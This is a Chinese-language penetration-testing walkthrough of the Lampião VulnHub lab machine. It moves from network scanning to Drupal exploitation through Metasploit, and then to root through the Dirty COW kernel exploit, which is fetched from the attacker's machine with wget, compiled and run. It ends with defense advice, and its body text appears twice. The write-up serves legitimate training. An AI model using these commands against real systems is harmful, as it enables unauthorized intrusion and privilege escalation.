Lampião打靶记录
字数 901 2025-08-12 11:34:44

Lampião靶机渗透测试详细教学文档

一、靶机概述

Lampião是一个基于Drupal CMS的漏洞靶机,包含多个常见漏洞点,适合练习Web应用渗透测试和提权技术。

二、环境准备

1. 靶机下载与安装

  • 下载地址: https://www.vulnhub.com/entry/lampiao-1,249/#download
  • 导入虚拟机软件(VMware/VirtualBox)
  • 网络设置: 桥接至物理网卡

2. 攻击机准备

  • Kali Linux或其他渗透测试发行版
  • 确保与靶机在同一网络段

三、信息收集阶段

1. 发现靶机IP

arp-scan -l
netdiscover -r 192.168.0.0/24

2. 端口扫描

nmap -Pn -p 0-65535 -O 192.168.0.101

关键点: 发现1898端口运行Web服务

3. Web目录扫描

python3 dirsearch.py -u http://192.168.0.101:1898/ -x 403
python3 dirsearch.py -u http://192.168.0.101

4. 识别CMS版本

访问: http://192.168.0.101:1898/CHANGELOG.txt
关键发现: 暴露Drupal框架版本信息

四、漏洞利用阶段

1. 使用Metasploit框架

msfconsole
search drupal

2. 选择合适exploit

根据收集到的Drupal版本选择对应漏洞模块

3. 配置参数

show options
set rhost 192.168.0.101
set rport 1898
exploit

结果: 成功获取初始shell

五、提权阶段

1. 系统信息收集

uname -a

关键点: 识别Linux内核版本

2. 上传漏洞检测脚本

chmod +777 1.sh
./1.sh

发现: 系统存在脏牛(Dirty COW)漏洞(CVE-2016-5195)

3. 脏牛漏洞利用步骤

a. 获取利用代码

searchsploit dirty
locate linux/local/40847.cpp

b. 传输文件到靶机

scp /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp
python3 -m http.server 800

在靶机上:

wget http://192.168.0.110:800/40847.cpp

c. 编译执行

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
chmod +777 40847
./40847

结果: 显示root密码

4. 获取root权限

ssh root@192.168.0.104

六、关键知识点总结

  1. Drupal漏洞利用: 通过版本信息泄露找到对应漏洞
  2. 脏牛提权: Linux内核提权经典漏洞(CVE-2016-5195)
  3. 文件传输技巧: 通过Python HTTP服务传输文件
  4. 编译执行: 在目标系统上编译C++漏洞利用代码

七、防御建议

  1. 及时更新CMS系统
  2. 限制敏感文件访问(CHANGELOG.txt等)
  3. 保持操作系统内核更新
  4. 限制不必要的服务暴露

八、扩展学习

  1. 尝试其他Drupal漏洞利用方法
  2. 探索不使用Metasploit的手动利用方式
  3. 研究其他Linux提权技术(如SUID、sudo滥用等)
Lampião靶机渗透测试详细教学文档 一、靶机概述 Lampião是一个基于Drupal CMS的漏洞靶机,包含多个常见漏洞点,适合练习Web应用渗透测试和提权技术。 二、环境准备 1. 靶机下载与安装 下载地址: https://www.vulnhub.com/entry/lampiao-1,249/#download 导入虚拟机软件(VMware/VirtualBox) 网络设置: 桥接至物理网卡 2. 攻击机准备 Kali Linux或其他渗透测试发行版 确保与靶机在同一网络段 三、信息收集阶段 1. 发现靶机IP 2. 端口扫描 关键点 : 发现1898端口运行Web服务 3. Web目录扫描 4. 识别CMS版本 访问: http://192.168.0.101:1898/CHANGELOG.txt 关键发现 : 暴露Drupal框架版本信息 四、漏洞利用阶段 1. 使用Metasploit框架 2. 选择合适exploit 根据收集到的Drupal版本选择对应漏洞模块 3. 配置参数 结果 : 成功获取初始shell 五、提权阶段 1. 系统信息收集 关键点 : 识别Linux内核版本 2. 上传漏洞检测脚本 发现 : 系统存在脏牛(Dirty COW)漏洞(CVE-2016-5195) 3. 脏牛漏洞利用步骤 a. 获取利用代码 b. 传输文件到靶机 在靶机上: c. 编译执行 结果 : 显示root密码 4. 获取root权限 六、关键知识点总结 Drupal漏洞利用 : 通过版本信息泄露找到对应漏洞 脏牛提权 : Linux内核提权经典漏洞(CVE-2016-5195) 文件传输技巧 : 通过Python HTTP服务传输文件 编译执行 : 在目标系统上编译C++漏洞利用代码 七、防御建议 及时更新CMS系统 限制敏感文件访问(CHANGELOG.txt等) 保持操作系统内核更新 限制不必要的服务暴露 八、扩展学习 尝试其他Drupal漏洞利用方法 探索不使用Metasploit的手动利用方式 研究其他Linux提权技术(如SUID、sudo滥用等)